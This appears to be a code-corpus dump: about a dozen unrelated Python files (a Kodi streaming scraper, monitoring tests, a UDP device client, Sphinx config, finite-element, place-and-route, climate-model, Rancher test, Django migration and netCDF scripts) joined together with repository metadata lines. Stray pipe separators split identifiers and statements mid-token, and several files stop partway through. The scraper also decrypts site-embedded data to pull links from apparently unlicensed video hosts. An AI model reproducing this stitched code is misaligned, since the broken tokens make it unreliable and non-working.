@type text: basestring
"""
extensions = []
def __init__( | self, node, **kwargs):
Object.__init__(self)
self.node = node
self.data = None
self.text = None
for k,v in list(kwargs.items()):
setattr(s | elf, k, v)
def __getattr__(self, name):
if name not in self.__dict__:
if name in self.extensions:
v = None
setattr(self, name, v)
else:
raise AttributeError('Content has no attribute %s' % name)
else:
v = self.__dict__[name]
return v |
RuiNascimento/krepo | script.module.lambdascrapers/lib/lambdascrapers/sources_placenta/en_placenta-1.7.8/to_be_fixed/needsfixing/vumoo.py | Python | gpl-2.0 | 7,170 | 0.004045 | # -*- coding: UTF-8 -*-
#######################################################################
# ----------------------------------------------------------------------------
# "THE BEER-WARE LICENSE" (Revision 42):
# @Daddy_Blamo wrote this file. As long as you retain this notice you
# can do whatever you want with this stuff. If we meet some day, and you think
# this stuff is worth it, you can buy me a beer in return. - Muad'Dib
# ----------------------------------------------------------------------------
#######################################################################
# Addon Name: Placenta
# Addon id: plugin.video.placenta
# Addon Provider: Mr.Blamo
import urlparse,urllib,json,base64,hashlib,re,xbmc
from resources.lib.modules import client
from resources.lib.modules import cleantitle
from resources.lib.modules import source_utils
from resources.lib.modules import directstream
from resources.lib.modules import pyaes
class source:
def __init__(self):
self.priority = 1
self.language = ['en']
self.domains = ['vumoo.to']
self.base_link = 'http://vumoo.to/'
self.cdn_link = 'http://cdn.123moviesapp.net'
self.search_path = '/search?q=%s'
self.password = 'iso10126'
def movie(self, imdb, title, localtitle, aliases, year):
try:
url = {'title': title, 'year': year, 'imdb': imdb}
return urllib.urlencode(url)
except Exception:
return
def tvshow(self, imdb, tvdb, tvshowtitle, localtvshowtitle, aliases, year):
try:
data = {'tvshowtitle': tvshowtitle, 'year': year, 'imdb': imdb}
return urllib.urlencode(data)
except Exception:
return
def episode(self, url, imdb, tvdb, title, premiered, season, episode):
try:
data = urlparse.parse_qs(url)
data = dict((i, data[i][0]) for i in data)
data.update({'season': season, 'episode': episode, 'title': title, 'premiered': premiered})
return urllib.urlencode(data)
except Exception:
return
def sources(self, url, hostDict, hostprDict):
try:
sources = []
data = urlparse.parse_qs(url)
data = dict((i, data[i][0]) for i in data)
if 'tvshowtitle' in data:
urls = self.__get_episode_urls(data)
else:
urls = self.__get_movie_urls(data)
for url in urls:
response = client.request(url)
encrypted = re.findall('embedVal="(.+?)"', response)[0]
decrypted = self.__decrypt(encrypted)
storage = json.loads(decrypted)
for location in storage['videos']:
if 'sources' in location:
for source in location['sources']:
try:
link = source['file']
if 'google' in link or 'blogspot' in link:
quality = directstream.googletag(link)[0]['quality']
if 'lh3.googleusercontent' in link:
link = directstream.googleproxy(link)
sources.append({
'source': 'gvideo',
'quality': quality,
'language': 'en',
'url': link,
'direct': True,
'debridonly': False
})
else:
continue
except Exception:
continue
elif 'url' in location:
if 'http' in location['url']:
continue
url = urlparse.urljoin(self.cdn_link, location['url'])
response = client.request(url)
manifest = json.loads(response)
for video in manifest:
try:
quality = video['label']
link = video['file']
sources.append({
'source': 'CDN',
'quality | ': quality,
'language': 'en',
'url': link,
'direct': True,
'debridonly': False
})
| except Exception:
continue
return sources
except Exception:
return
def resolve(self, url):
try:
return url
except Exception:
return
def __get_episode_urls(self, data):
try:
search = self.search_path % data['imdb']
url = urlparse.urljoin(self.base_link, search)
response = client.request(url)
jsobj = json.loads(response)
for obj in jsobj['suggestions']:
if data['season'] in obj['value']:
url = urlparse.urljoin(self.base_link, obj['data']['href'])
response = client.request(url)
urls = re.findall('embedUrl="([^<]*?)">s%02de%02d<' % (int(data['season']), int(data['episode'])), response)
return urls
except Exception:
return
def __get_movie_urls(self, data):
try:
search = self.search_path % data['imdb']
url = urlparse.urljoin(self.base_link, search)
response = client.request(url)
jsobj = json.loads(response)
path = jsobj['suggestions'][0]['data']['href']
url = urlparse.urljoin(self.base_link, path)
response = client.request(url)
urls = re.findall('embedUrl="(.+?)">', response)
return urls
except Exception:
return
def __bytes_to_key(self, password, salt, output=48):
try:
seed = hashlib.md5(password + salt).digest()
key = seed
while len(key) < output:
seed = hashlib.md5(seed + (password + salt)).digest()
key += seed
return key[:output]
except Exception:
return
def __decrypt(self, encrypted):
try:
encrypted = base64.b64decode(encrypted)
salt = encrypted[8:16]
key_iv = self.__bytes_to_key(self.password, salt)
key = key_iv[:32]
iv = key_iv[32:]
decrypter = pyaes.Decrypter(pyaes.AESModeOfOperationCBC(key, iv = iv))
plaintext = decrypter.feed(encrypted[16:])
plaintext += decrypter.feed()
return plaintext
except Exception:
return |
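# Note (informational): the base64-decoded payload follows OpenSSL's salted
# layout (bytes 8:16 hold the salt), and __bytes_to_key mirrors EVP_BytesToKey
# with MD5, producing 48 bytes split into a 32-byte AES key and a 16-byte IV.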
WPMedia/dd-agent | tests/checks/integration/test_cassandra.py | Python | bsd-3-clause | 2,080 | 0.000481 | # stdlib
import threading
import time
from types import ListType
import unittest
# 3p
from nose.plugins.attrib import attr
# project
from aggregator import MetricsAggregator
from dogstatsd import Server
from jmxfetch import JMXFetch
from tests.checks.common import Fixtures
STATSD_PORT = 8121
class DummyReporter(threading.Thread):
def __init__(self, metrics_aggregator):
threading.Thread.__init__(self)
self.finished = threading.Event()
self.metrics_aggregator = metrics_aggregator
self.interval = 10
self.metrics = None
self.finished = False
self.start()
def run(self):
while not self.finished:
time.sleep(self.interval)
self.flush()
def flush(self):
metrics = self.metrics_aggregator.flush()
if metrics:
self.metrics = metrics
@attr(requires='cassandra')
class JMXTestCase(unittest.TestCase):
def setUp(self):
aggregator = MetricsAggregator("test_host")
self.server = Server(aggregator, "localhost", STATSD_PORT)
self.reporter = DummyReporter(aggregator)
self.t1 = threading.Thread(target=self.server.start)
self.t1.start()
confd_path = Fixtures.directory()
self.jmx_daemon = JMXFetch(confd_path, {'dogstatsd_port': STATSD_PORT})
self.t2 = threading.Thread(target=self.jmx_daemon.run)
self.t2.start()
def tearDown(self):
self.server.stop()
self.reporter.finished = True
self.jmx_daemon.terminate()
def testCustomJMXMetric(self):
count = 0
while self.reporter.metrics is None:
time.sleep(1)
count += 1
if count > 25:
raise Exception("No metrics were received in 25 seconds")
metrics = self.reporter.metrics
self.assertTrue(isinstance(metrics, ListType))
self.assertTrue(len(metrics) > 0)
self | .assertTrue(len([t for t in metrics if "cassandra.db." in t['metric'] and "instance:cassandra_instance" in t[ | 'tags']]) > 40, metrics)
|
kasundezoysa/senze | testpi/myDevice.py | Python | apache-2.0 | 4,355 | 0.027325 | #!/usr/bin/env python
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
from twisted.internet.protocol import DatagramProtocol
from twisted.internet import reactor
import datetime
import socket
import time
import sys
import os.path
lib_path = os.path.abspath('../utils')
sys.path.append(lib_path)
from myParser import *
from myCrypto import *
#from myDriver import *
#from myCamDriver import *
import re
import hashlib
#from PIL import Image
#host='connect.mysensors.info'
host='localhost'
port=9090
state="INITIAL"
device=""
server="mysensors"
class mySensorDatagramProtocol(DatagramProtocol):
def __init__(self, host,port,reactor):
| self.ip= socket.gethostbyname(host)
self.port = port
#self._reactor=reactor
#self.ip=reactor.resolve(host)
def startProtocol(self):
| self.transport.connect(self.ip,self.port)
if state=='INITIAL':
#If system is at the initial state, it will send the device creation Senze
self.register()
else:
response=raw_input("Enter your Senze:")
self.sendDatagram(response)
def stopProtocol(self):
#on disconnect
#self._reactor.listenUDP(0, self)
print "STOP **************"
def register(self):
global server
cry=myCrypto(name=device)
senze ='SHARE #pubkey %s @%s' %(pubkey,server)
senze=cry.signSENZE(senze)
self.transport.write(senze)
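# Illustrative example: the plaintext senze built above resembles
#   'SHARE #pubkey <PEM public key> @mysensors'
# before signSENZE (presumably) appends the device's RSA signature.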
def sendDatagram(self,senze):
global server
cry=myCrypto(name=device)
senze=cry.signSENZE(senze)
print senze
self.transport.write(senze)
def datagramReceived(self, datagram, host):
print 'Datagram received: ', repr(datagram)
parser=myParser(datagram)
recipients=parser.getUsers()
sender=parser.getSender()
signature=parser.getSignature()
data=parser.getData()
sensors=parser.getSensors()
cmd=parser.getCmd()
if cmd=="DATA":
if 'UserCreated' in data['msg']:
#Creating the .devicename file and store the device name and PIN
f=open(".devicename",'w')
f.write(device+'\n')
f.close()
print device+ " was created at the server."
print "You should execute the program again."
print "The system halted!"
reactor.stop()
elif 'UserCreationFailed' in data['msg']:
print "This user name may be already taken"
print "You can try it again with different username"
print "The system halted!"
reactor.stop()
#self.sendDatagram()
def init():
#cam=myCamDriver()
global device
global pubkey
global state
#If the .devicename file is not there, we will read the device name from the keyboard;
#else we will get it from the .devicename file
try:
if not os.path.isfile(".devicename"):
device=raw_input("Enter the device name: ")
# Account need to be created at the server
state='INITIAL'
else:
#The device name will be read form the .devicename file
f=open(".devicename","r")
device = f.readline().rstrip("\n")
state='READY'
except:
print "ERRER: Cannot access the device name file."
raise SystemExit
#Here we will generate public and private keys for the device
#These keys will be used to perform authentication and key exchange
try:
cry=myCrypto(name=device)
#If keys are not available yet
if not os.path.isfile(cry.pubKeyLoc):
# Generate or loads an RSA keypair with an exponent of 65537 in PEM format
# Private key and public key was saved in the .devicenamePriveKey and .devicenamePubKey files
cry.generateRSA(bits=1024)
pubkey=cry.loadRSAPubKey()
except:
print "ERRER: Cannot genereate private/public keys for the device."
raise SystemExit
print pubkey
#Check the network connectivity.
#check_connectivity(ServerName)
def main():
global host
global port
protocol = mySensorDatagramProtocol(host,port,reactor)
reactor.listenUDP(0, protocol)
reactor.run()
if __name__ == '__main__':
init()
main()
|
crate/crate-docs-theme | src/crate/theme/rtd/conf/sql_99.py | Python | apache-2.0 | 1,537 | 0 | # -*- coding: utf-8; -*-
#
# Licensed to Crate (https://crate.io) under one or more contributor
# license agreements. See the NOTICE file distributed with this work for
# additional information regarding copyright ownership. Crate licenses
# this file to you under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License. You may
# obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless requ | ire | d by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# However, if you have executed another commercial license agreement
# with Crate these terms will supersede the license and you may use the
# software solely pursuant to the terms of the relevant commercial agreement.
from crate.theme.rtd.conf import *
# If you update the `project` value here, you must update it in the
# `src/crate/theme/rtd/crate/sidebartoc.html` file or else Sphinx will not
# expand the sidebar TOC for this project.
project = u"SQL 99"
html_title = project
url_path = "docs/sql-99"
# For sitemap extension
html_baseurl = "https://crate.io/%s/" % url_path
# For rel="canonical" links
html_theme_options.update(
{
"canonical_url_path": "%s/en/latest/" % url_path,
}
)
ogp_site_url = html_baseurl
|
blechta/dolfin-tape | dolfintape/demo_problems/StokesVortices.py | Python | gpl-3.0 | 2,060 | 0.000971 | # Copyright (C) 2015 Jan Blechta
#
# This file is part of dolfin-tape.
#
# dolfin-tape is free | software: you can | redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# dolfin-tape is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with dolfin-tape. If not, see <http://www.gnu.org/licenses/>.
from dolfin import *
from dolfintape.demo_problems.GeneralizedStokes import GeneralizedStokesProblem
from dolfintape.demo_problems.exact_solutions import pStokes_vortices
__all__ = ['StokesVortices']
class NewtonianFluid(object):
def __init__(self, mu):
self._mu = mu
def r(self):
return 2
def mu(self):
return self._mu
def g(self):
return lambda s, d, eps: Constant(1.0/(2.0*self._mu))*s - d
class StokesVortices(GeneralizedStokesProblem):
n = 4 # Number of vortices
mu = 1.0
def __init__(self, N):
mesh = UnitSquareMesh(N, N, "crossed")
constitutive_law = NewtonianFluid(self.mu)
# FIXME: Those expressions need domain but it causes integration domain
# confusion in spatial adaptivity
self.u_ex, self.p_ex, self.s_ex, self.f = \
pStokes_vortices(n=self.n, mu=self.mu, r=2, eps=0.0,
degree=6, domain=mesh)
GeneralizedStokesProblem.__init__(self, mesh, constitutive_law,
self.f, 0.0)
def bcs(self, W):
bc_u = DirichletBC(W.sub(0), (0.0, 0.0), "on_boundary")
bc_p = DirichletBC(W.sub(1), 0.0, "near(x[0], 0.0) && near(x[1], 0.0)",
method="pointwise")
return [bc_u, bc_p]
|
project-rig/rig | rig/place_and_route/utils.py | Python | gpl-2.0 | 13,067 | 0.000077 | """Utilities functions which assist in the generation of commonly required data
structures from the products of placement, allocation and routing.
"""
from collections import defaultdict
from six import iteritems, itervalues
import warnings
from rig.place_and_route.machine import Machine, Co | res, SDRAM, SRAM
from rig.place_and_route.constraints import ReserveResourceConstraint
from rig.machine_control.consts import AppState
def build_machine(system_info,
core_resource=Cores,
sdram_resource=SDRAM,
sram_resource=SRAM):
"""Build a :py:class:`~rig.place_and_route.Machine` object from a
:py:class:`~rig.machine_control.machine_controller.SystemInfo` object.
.. note::
| Links are tested by sending a 'PEEK' command down the link which
checks to see if the remote device responds correctly. If the link
is dead, no response will be received and the link will be assumed
dead. Since peripherals do not generally respond to 'PEEK'
commands, working links attached to peripherals will also be marked
as dead.
.. note::
The returned object does not report how much memory is free, nor
how many cores are idle but rather the total number of working cores
and the size of the heap. See :py:func:`.build_resource_constraints`
for a function which can generate a set of
:py:class:`~rig.place_and_route.constraints` which prevent the use of
already in-use cores and memory.
.. note::
This method replaces the deprecated
:py:meth:`rig.machine_control.MachineController.get_machine` method.
Its functionality may be recreated using
:py:meth:`rig.machine_control.MachineController.get_system_info` along
with this function like so::
>> sys_info = mc.get_system_info()
>> machine = build_machine(sys_info)
Parameters
----------
system_info : :py:class:`rig.machine_control.machine_controller.SystemInfo`
The resource availability information for a SpiNNaker machine,
typically produced by
:py:meth:`rig.machine_control.MachineController.get_system_info`.
core_resource : resource (default: :py:class:`rig.place_and_route.Cores`)
The resource type to use to represent the number of working cores on a
chip, including the monitor, those already in use and all idle cores.
sdram_resource : resource (default: :py:class:`rig.place_and_route.SDRAM`)
The resource type to use to represent SDRAM on a chip. This resource
will be set to the number of bytes in the largest free block in the
SDRAM heap. This gives a conservative estimate of the amount of free
SDRAM on the chip which will be an underestimate in the presence of
memory fragmentation.
sram_resource : resource (default: :py:class:`rig.place_and_route.SRAM`)
The resource type to use to represent SRAM (a.k.a. system RAM) on a
chip. This resource will be set to the number of bytes in the largest
free block in the SRAM heap. This gives a conservative estimate of the
amount of free SRAM on the chip which will be an underestimate in the
presence of memory fragmentation.
Returns
-------
:py:class:`rig.place_and_route.Machine`
A :py:class:`~rig.place_and_route.Machine` object representing the
resources available within a SpiNNaker machine in the form used by the
place-and-route infrastructure.
"""
try:
max_cores = max(c.num_cores for c in itervalues(system_info))
except ValueError:
max_cores = 0
try:
max_sdram = max(c.largest_free_sdram_block
for c in itervalues(system_info))
except ValueError:
max_sdram = 0
try:
max_sram = max(c.largest_free_sram_block
for c in itervalues(system_info))
except ValueError:
max_sram = 0
return Machine(width=system_info.width,
height=system_info.height,
chip_resources={
core_resource: max_cores,
sdram_resource: max_sdram,
sram_resource: max_sram,
},
chip_resource_exceptions={
chip: {
core_resource: info.num_cores,
sdram_resource: info.largest_free_sdram_block,
sram_resource: info.largest_free_sram_block,
}
for chip, info in iteritems(system_info)
if (info.num_cores != max_cores or
info.largest_free_sdram_block != max_sdram or
info.largest_free_sram_block != max_sram)
},
dead_chips=set(system_info.dead_chips()),
dead_links=set(system_info.dead_links()))
def _get_minimal_core_reservations(core_resource, cores, chip=None):
"""Yield a minimal set of
:py:class:`~rig.place_and_route.constraints.ReserveResourceConstraint`
objects which reserve the specified set of cores.
Parameters
----------
core_resource : resource type
The type of resource representing cores.
cores : [int, ...]
The core numbers to reserve *in ascending order*.
chip : None or (x, y)
Which chip the constraints should be applied to or None for a global
constraint.
Yields
------
:py:class:`~rig.place_and_route.constraints.ReserveResourceConstraint`
"""
reservation = None
# Cores is in ascending order
for core in cores:
if reservation is None:
reservation = slice(core, core + 1)
elif reservation.stop == core:
reservation = slice(reservation.start, core + 1)
else:
yield ReserveResourceConstraint(
core_resource, reservation, chip)
reservation = slice(core, core + 1)
if reservation is not None:
yield ReserveResourceConstraint(core_resource, reservation, chip)
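# Worked example: cores [1, 2, 3, 5] yield two constraints, one reserving
# slice(1, 4) (cores 1-3 are contiguous) and one reserving slice(5, 6).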
def build_core_constraints(system_info, core_resource=Cores):
"""Return a set of place-and-route
:py:class:`~rig.place_and_route.constraints.ReserveResourceConstraint`
    which reserve any cores that are already in use.
The returned list of
:py:class:`~rig.place_and_route.constraints.ReserveResourceConstraint`\ s
    reserves all cores not in an Idle state (i.e. the monitor core and any
    cores already running an application).
.. note::
Historically, every application was required to add a
        :py:class:`~rig.place_and_route.constraints.ReserveResourceConstraint` to
reserve the monitor processor on each chip. This method improves upon
this approach by automatically generating constraints which reserve not
just the monitor core but also any other cores which are already in
use.
Parameters
----------
system_info : :py:class:`rig.machine_control.machine_controller.SystemInfo`
The resource availability information for a SpiNNaker machine,
typically produced by
:py:meth:`rig.machine_control.MachineController.get_system_info`.
core_resource : resource (Default: :py:data:`~rig.place_and_route.Cores`)
The resource identifier used for cores.
Returns
-------
[:py:class:`rig.place_and_route.constraints.ReserveResourceConstraint`, \
...]
A set of place-and-route constraints which reserves all non-idle cores.
The resource type given in the ``core_resource`` argument will be
reserved accordingly.
"""
constraints = []
# Find the set of cores which are universally reserved
globally_reserved = None
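    # each chip's busy cores are packed into an integer bitmask: bit c is
    # set when core c is in any state other than idle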
for chip_info in itervalues(system_info):
reserved = sum(1 << c for c, state in enumerate(chip_info.core_states)
if state != AppState.idle)
if globally_reserved is None:
globally_reserved = reserved
else:
g |
code-for-india/sahana_shelter_worldbank | modules/s3db/climate.py | Python | mit | 27,377 | 0.009972 | # -*- coding: utf-8 -*-
""" Sahana Eden Climate Model
@copyright: 2011-2013 (c) Sahana Software Foundation
@license: MIT
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following
conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
__all__ = ["S3ClimateModel",
"climate_first_run",
]
from gluon import *
from gluon.storage import Storage
from ..s3 import *
# =============================================================================
class S3ClimateModel(S3Model):
"""
Climate data is stored in dynamically created tables.
These tables can be added from the command line script add_table.py
in modules.ClimateDataPortal.
The table definitions are stored in climate_sample_table_spec.
        A datum is an observed value over a time quantum at a given place.
e.g. observed temperature in Kathmandu between Feb 2006 - April 2007
Places are currently points, i.e. lat/lon coordinates.
Places may be stations.
Places may have elevation or other optional information.
@ToDo: i18n
@ToDo: Deprecate raw SQL (Tested only on PostgreSQL)
"""
names = ["climate_place",
"climate_place_elevation",
"climate_place_station_name",
"climate_place_station_id",
"climate_sample_table_spec",
"climate_monthly_aggregation",
"climate_station_parameter",
"climate_prices",
"climate_purchase",
"climate_save_query",
]
def model(self):
T = current.T
db = current.db
auth = current.auth
NONE = current.messages["NONE"]
configure = self.configure
crud_strings = current.response.s3.crud_strings
define_table = self.define_table
# | ---------------------------------------------------------------------
# Climate Place
#
# This resource is spread over 4 tables, which | we assume are linked by
# common IDs
#
# @ToDo: Migrate to gis_location?
# Although this table has many fields unused so a performance hit?
# elevation is not included as it would just mean a performance hit
# when we are generating 2D maps without elevation info.
define_table("climate_place",
Field("longitude", "double",
notnull=True,
required=True,
),
Field("latitude", "double",
notnull=True,
required=True,
)
)
# ---------------------------------------------------------------------
# elevation may not be useful for future projects
# e.g. where not available, or sea-based stations
# also, elevation may be supplied for gridded data
define_table("climate_place_elevation",
Field("elevation_metres", "double",
notnull=True,
required=True,
),
)
# ---------------------------------------------------------------------
# not all places are stations with elevations
# as in the case of "gridded" data
# a station can only be in one place
define_table("climate_place_station_name",
Field("name", "double",
notnull=True,
required=True,
),
)
station_id = S3ReusableField("station_id", "reference %s" % tablename,
sortby="name",
requires = IS_ONE_OF(db,
"climate_place_station_name.id",
climate_station_represent,
orderby="climate_place_station_name.name",
sort=True
),
represent = climate_station_represent,
label = "Station",
ondelete = "RESTRICT"
)
# ---------------------------------------------------------------------
# station id may not be useful or even meaningful
# e.g. gridded data has no stations.
# this is passive data so ok to store separately
define_table("climate_place_station_id",
Field("station_id", "integer",
notnull=True,
required=True,
),
)
# ---------------------------------------------------------------------
        # coefficient of variation is meaningless for degrees C but OK for Kelvin
        # internally all scales must be ratio scales if coefficient
        # of variation is to be allowed, (which it is)
# rainfall (mm), temp (K) are ok
# output units
define_table("climate_sample_table_spec",
Field("name",
notnull=True,
required=True,
),
Field("sample_type_code",
length = 1,
notnull = True,
# web2py requires a default value for not null fields
default = "",
required = True
),
Field("field_type",
notnull=True,
required=True,
),
Field("units",
notnull=True,
required=True,
),
Field("date_mapping",
default="",
notnull=True,
required=True
),
Field("grid_size", "double",
default = 0,
notnull = True,
required = True
)
)
parameter_id = S3ReusableField("parameter_id", "reference %s" % tablename,
sortby="name",
requires = IS_ONE_OF(db,
"climate_sample_table_spec.id",
sample_table_spec_represent,
sort=True
),
represent = sample_table_spec_represent,
label = "Parameter",
ondelete = "RESTRICT"
)
# -------- |
rancher/rancher | tests/validation/tests/rke/test_install_config.py | Python | apache-2.0 | 4,984 | 0 | from .conftest import * # NOQA
from .common import * # NOQA
def test_install_config_1(test_name, cloud_provider, rke_client, kubectl):
"""
Node Address specified as just IP and using only this in the node spec
Specific kubernetes_version can be used
"""
rke_template = 'cluster_install_config_11.yml.j2'
nodes = cloud_provider.create_multiple_nodes(3, test_name)
create_and_validate(
cloud_provider, rke_client, kubectl, rke_template, nodes,
remove_nodes=True)
def test_install_config_2(test_name, cloud_provider, rke_client, kubectl):
"""
Node Address specified as FQDN and using only this in the node spec
"""
rke_template = 'cluster_install_config_2.yml.j2'
nodes = cloud_provider.create_multiple_nodes(3, test_name)
create_and_validate(
cloud_provider, rke_client, kubectl, rke_template, nodes,
remove_nodes=True)
def test_install_config_3(test_name, cloud_provider, rke_client, kubectl):
"""
Hostname override specified as a non resolvable name
"""
rke_template = 'cluster_install_config_3.yml.j2'
nodes = cloud_provider.create_multiple_nodes(3, test_name)
# set node_name to non-resolvable name for hostname_override
index = 0
for node in nodes:
node.node_name = "{0}-{1}".format(test_name, index)
index += 1
create_and_validate(
cloud_provider, rke_client, kubectl, rke_template, nodes,
remove_nodes=True)
def test_install_config_4(test_name, cloud_provider, rke_client, kubectl):
"""
Hostname override specified as a resolvable name
"""
rke_template = 'cluster_install_config_4.yml.j2'
nodes = cloud_provider.create_multiple_nodes(3, test_name)
# set node_name to the resolvable host_name for hostname_override
for node in nodes:
node.node_name = node.host_name
create_and_validate(
cloud_provider, rke_client, kubectl, rke_template, nodes,
remove_nodes=True)
def test_install_config_5(test_name, cloud_provider, rke_client, kubectl):
"""
Internal address provided
"""
rke_template = 'cluster_install_config_5.yml.j2'
nodes = cloud_provider.create_multiple_nodes(3, test_name)
create_and_validate(
cloud_provider, rke_client, kubectl, rke_template, nodes,
remove_nodes=True, etcd_private_ip=True)
def test_install_config_6(test_name, cloud_provider, rke_client, kubectl):
"""
Providing address, hostname override(resolvable) and internal address
"""
rke_template = 'cluster_install_config_6.yml.j2'
nodes = cloud_provider.create_multiple_nodes(3, test_name)
# set node_name to the resolvable host_name for hostname_override
for node in nodes:
node.node_name = node.host_name
create_and_validate(
cloud_provider, rke_client, kubectl, rke_template, nodes,
remove_nodes=True, etcd_private_ip=True)
def test_install_config_7(test_name, cloud_provider, rke_client, kubectl):
"""
Providing address, hostname override(non-resolvable) and internal address
"""
rke_template = 'cluster_install_config_7.yml.j2'
nodes = cloud_provider.create_multiple_nodes(3, test_name)
# set node_name to non-resolvable name for hostname_override
index = 0
for node in nodes:
node.node_name = "{0}-{1}".format(test_name, index)
index += 1
create_and_validate(
cloud_provider, rke_client, kubectl, rke_template, nodes,
remove_nodes=True, etcd_private_ip=True)
def test_install_config_8(test_name, cloud_provider, rke_client, kubectl):
"" | "
Create a cluster with minimum possible values, will use the defaulted
network plugin for RKE
"""
rke_template = 'cluster_install_config_8.yml.j2'
nodes = cloud_provider.create_multiple_nodes(3, test_name)
create_a | nd_validate(
cloud_provider, rke_client, kubectl, rke_template, nodes,
remove_nodes=True)
def test_install_config_9(test_name, cloud_provider, rke_client, kubectl):
"""
Launch a cluster with unencrypted ssh keys
"""
key_name = 'install-config-9'
rke_template = 'cluster_install_config_9.yml.j2'
public_key = cloud_provider.generate_ssh_key(key_name)
cloud_provider.import_ssh_key(key_name + '.pub', public_key)
nodes = cloud_provider.create_multiple_nodes(
3, test_name, key_name=key_name + '.pub')
create_and_validate(
cloud_provider, rke_client, kubectl, rke_template, nodes,
remove_nodes=True)
# def test_install_config_10(test_name, cloud_provider, rke_client, kubectl):
# """
# Launch a cluster with encrypted ssh keys
# """
# rke_template = 'cluster_install_config_10.yml.j2'
# nodes = cloud_provider.create_multiple_nodes(3, test_name)
# create_rke_cluster(rke_client, kubectl, nodes, rke_template)
# validate_rke_cluster(rke_client, kubectl, nodes)
# for node in nodes:
# cloud_provider.delete_node(node)
|
hzlf/openbroadcast.org | website/apps/massimporter/migrations/0001_initial.py | Python | gpl-3.0 | 4,610 | 0.000434 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import django_extensions.db.fields
import django.db.models.deletion
from django.conf import settings
import uuid
class Migration(migrations.Migration):
dependencies = [
("importer", "0001_initial"),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name="Massimport",
fields=[
(
"id",
models.AutoField(
verbose_name="ID",
serialize=False,
auto_created=True,
primary_key=True,
),
),
(
"created",
django_extensions.db.fields.CreationDateTimeField(
auto_now_add=True
),
),
(
"updated",
django_extensions.db.fields.ModificationDateTimeField(
auto_now=True
),
),
(
"status",
models.PositiveIntegerField(
default=0,
choices=[
(0, "Init"),
(1, "Done"),
(2, "Queued"),
(99, "Error"),
],
),
),
("directory", models.CharField(max_length=1024)),
("uuid", models.UUIDField(default=uuid.uuid4)),
(
"collection_name",
models.CharField(max_length=250, null=True, blank=True),
),
(
"user",
models.ForeignKey(
on_delete=django.db.models.deletion.SET_NULL,
| blank=True,
to=settings.AUTH_USER_MODEL,
null=True,
),
),
],
options={
"ordering": ("-created",),
"verbose_name": "Import",
"verbose_name_plural": "Imports",
| "permissions": (("massimport_manage", "Manage Massimporter Sessions"),),
},
),
migrations.CreateModel(
name="MassimportFile",
fields=[
(
"id",
models.AutoField(
verbose_name="ID",
serialize=False,
auto_created=True,
primary_key=True,
),
),
(
"created",
django_extensions.db.fields.CreationDateTimeField(
auto_now_add=True
),
),
(
"updated",
django_extensions.db.fields.ModificationDateTimeField(
auto_now=True
),
),
(
"status",
models.PositiveIntegerField(
default=0,
db_index=True,
choices=[
(0, "Init"),
(1, "Done"),
(2, "Ready"),
(3, "Working"),
(4, "Warning"),
(5, "Duplicate"),
(6, "Queued"),
(7, "Importing"),
(99, "Error"),
(11, "Other"),
],
),
),
("path", models.CharField(max_length=1024)),
("uuid", models.UUIDField(default=uuid.uuid4)),
("import_file", models.ForeignKey(to="importer.ImportFile", null=True)),
(
"massimport",
models.ForeignKey(
related_name="files", to="massimporter.Massimport"
),
),
],
options={
"ordering": ("-created",),
"verbose_name": "File",
"verbose_name_plural": "Files",
},
),
]
|
rhyswhitley/savanna_iav | src/data_preproc/pickleit/pickle_inputs.py | Python | cc0-1.0 | 2,001 | 0.004998 | #!/usr/bin/env python
import os
import re
import netCDF4 as nc
import numpy as np
import pandas as pd
import pickle
def get_value(nc_o | bj, label):
return nc_obj.variables[label][:].flatten()
def get_dataframe(nc_path):
"""
A quick function to transform a netcdf file into a pandas dataframe that
| can be used for analysis and plotting. Attributes are extracted using
in built netCDF4 library functions. Time is arbitrary and needs to be
set by the user.
"""
print("> pickling contents in object at {0}".format(nc_path))
# make a connection to the netCDF file
ncdf_con = nc.Dataset(nc_path, 'r', format="NETCDF4")
# number of rows, equivalent to time-steps
time_len = len(ncdf_con.dimensions['time'])
# extract time information
time_sec = ncdf_con.variables['time']
sec_orig = re.search(r'\d+.*', str(time_sec.units)).group(0)
# the header values for each measurements; excludes time and space components
nc_allkeys = ncdf_con.variables.keys()
# only want time-varying inputs
data_values = [key for key in nc_allkeys \
if re.search("^((?!x|y|time|latitude|longitude).)*$", key)]
# create a new dataframe from the netCDF file
nc_dataframe = pd.DataFrame({label: get_value(ncdf_con, label) \
for label in data_values}, \
index=pd.date_range(sec_orig, \
periods=time_len, freq="30min"))
return nc_dataframe
def main():
# Retrieve dataframes of tree and grass productivity from ncdf files
input_df = get_dataframe(DIRPATH)
# pickle the leaf scale outputs (see if it's quicker to load)
pickle.dump(input_df, open(PKLPATH+"hourly/tower_inputs.pkl", "wb"))
return None
if __name__ == '__main__':
